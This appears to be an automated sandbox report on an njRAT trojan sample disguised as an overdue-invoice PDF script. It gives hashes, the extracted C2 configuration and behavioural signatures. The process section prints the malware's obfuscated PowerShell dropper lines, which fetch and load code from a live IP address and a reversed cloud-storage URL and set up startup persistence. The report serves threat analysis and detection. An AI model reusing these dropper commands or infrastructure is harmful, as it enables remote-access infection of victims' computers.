njrat | 80d4b70c3b8c11f6c761e105ce14f61e191a89cc8bd81ee86fb741f48bfdb7ff

General

Target

DETALLES FACTUTACION VENCIDA.PDF.vbs
Size

208KB
MD5

c2a54f061aba21192c2366e5aff19ef3
SHA1

0e35261883e5bbe9df33797d230f7180309b083e
SHA256

80d4b70c3b8c11f6c761e105ce14f61e191a89cc8bd81ee86fb741f48bfdb7ff
SHA512

59ebcecb57800046d977e2fdd733d29e41d3ca14feab25b730ceeee8e6f4fa5e40e72eff2c3a629c8d9af298dbad1e18c1a34d87cef76e908f754f3221b558db

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

quilleras.duckdns.org:2054

Mutex

304ca59d53bc4d4

Attributes

reg_key
304ca59d53bc4d4
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 1752 powershell.exe
7 1752 powershell.exe

flow	pid	process
5	1752	powershell.exe
7	1752	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\note.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\note.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1752 set thread context of 4212 1752 powershell.exe CasPol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3556 powershell.exe
3556 powershell.exe
1752 powershell.exe
1752 powershell.exe

description	pid	process	target process
PID 1752 set thread context of 4212	1752	powershell.exe	CasPol.exe

pid	process
3556	powershell.exe
3556	powershell.exe
1752	powershell.exe
1752	powershell.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

Processes:

powershell.exepowershell.exeCasPol.exe

description	pid	process
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe
Token: 33	4212	CasPol.exe
Token: SeIncBasePriorityPrivilege	4212	CasPol.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2384 wrote to memory of 3556	2384	WScript.exe	powershell.exe
PID 2384 wrote to memory of 3556	2384	WScript.exe	powershell.exe
PID 3556 wrote to memory of 1752	3556	powershell.exe	powershell.exe
PID 3556 wrote to memory of 1752	3556	powershell.exe	powershell.exe
PID 1752 wrote to memory of 4212	1752	powershell.exe	CasPol.exe
PID 1752 wrote to memory of 4212	1752	powershell.exe	CasPol.exe
PID 1752 wrote to memory of 4212	1752	powershell.exe	CasPol.exe
PID 1752 wrote to memory of 4212	1752	powershell.exe	CasPol.exe
PID 1752 wrote to memory of 4212	1752	powershell.exe	CasPol.exe
PID 1752 wrote to memory of 4212	1752	powershell.exe	CasPol.exe
PID 1752 wrote to memory of 4212	1752	powershell.exe	CasPol.exe
PID 1752 wrote to memory of 4212	1752	powershell.exe	CasPol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEMAbwBwAHkA⚔⚔⚔wB0AGEAcgB0AH⚔⚔⚔AcABSAG8AZABhAC⚔⚔⚔AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBTAHkAcwB0AG⚔⚔⚔AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMwAuADEAMAA2AC4AMQA5ADEALgAxADAANQAvAGQAbABsAC8AZABsAGwAJQBFADIAJQA5ADMAJQA5ADQAJQBFADIAJQA5ADMAJQA5ADQAJQBFADIAJQA5ADMAJQA5ADQALgB0AHgAdAAnACkAKQA7AFsA⚔⚔⚔wB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⚔⚔⚔AcgByAG⚔⚔⚔AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⚔⚔⚔AKAAnAHgASwB2AEsAawB1AE4AWgAuAF⚔⚔⚔ARwBsAHkAbQB6AF⚔⚔⚔AZwAnACkALgBHAG⚔⚔⚔AdABNAG⚔⚔⚔AdABoAG8AZAAoACcAVQBEAHMA⚔⚔⚔wBpAEQAYgBiACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⚔⚔⚔AbABsACwAIABbAG8AYgBqAG⚔⚔⚔AYwB0AFsAXQBdACAAKAAnADEAMAAzADAAMAA5ADAAZgA0AGMANAA4AC0AYwAzADIAOAAtADEAMQAxADQALQA3ADEAYQA3AC0AYwA0ADYANgAxAGYAOAA0AD0AbgBlAGsAbwB0ACYAYQBpAGQAZQBtAD0AdABsAGEAPwB0AHgAdAAuAE8AVABYAE⚔⚔⚔AVAAvAG8ALwBtAG8AYwAuAHQAbwBwAHMAcABwAGEALgB0AG4AZQBwAG4AaQB0AHMAZQB0AC8AYgAvADAAdgAvAG0AbwBjAC4AcwBpAHAAYQBlAGwAZwBvAG8AZwAuAG⚔⚔⚔AZwBhAHIAbwB0AHMAZQBzAGEAYgBlAHIAaQBmAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⚔⚔⚔gBvAGQAYQBDAG8AcAB5ACAALAAgACcAbgBvAHQAZQAnACAAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('⚔⚔⚔','U') ) );$OWjuxD = $OWjuxD.replace('%CopyStartupRoda%', 'C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('1030090f4c48-c328-1114-71a7-c4661f84=nekot&aidem=tla?txt.OTXET/o/moc.topsppa.tnepnitset/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'note' ))"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4212

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
0ff7e1af4cc86e108eef582452b35523

SHA1
c2ccf2811d56c3a3a58dced2b07f95076c6b5b96

SHA256
62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0

SHA512
374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

Download Submit
memory/1752-137-0x00007FF83F280000-0x00007FF83FD41000-memory.dmp

Filesize
10.8MB

Download
memory/1752-132-0x0000000000000000-mapping.dmp

Download
memory/1752-134-0x00007FF83F280000-0x00007FF83FD41000-memory.dmp

Filesize
10.8MB

Download
memory/3556-133-0x00007FF83F280000-0x00007FF83FD41000-memory.dmp

Filesize
10.8MB

Download
memory/3556-130-0x0000000000000000-mapping.dmp

Download
memory/3556-131-0x000002557E040000-0x000002557E062000-memory.dmp

Filesize
136KB

Download
memory/3556-140-0x00007FF83F280000-0x00007FF83FD41000-memory.dmp

Filesize
10.8MB

Download
memory/4212-136-0x000000000040677E-mapping.dmp

Download
memory/4212-135-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4212-141-0x00000000056E0000-0x000000000577C000-memory.dmp

Filesize
624KB

Download
memory/4212-142-0x0000000005D50000-0x00000000062F4000-memory.dmp

Filesize
5.6MB

Download
memory/4212-143-0x0000000005900000-0x0000000005992000-memory.dmp

Filesize
584KB

Download
memory/4212-144-0x00000000058A0000-0x00000000058AA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads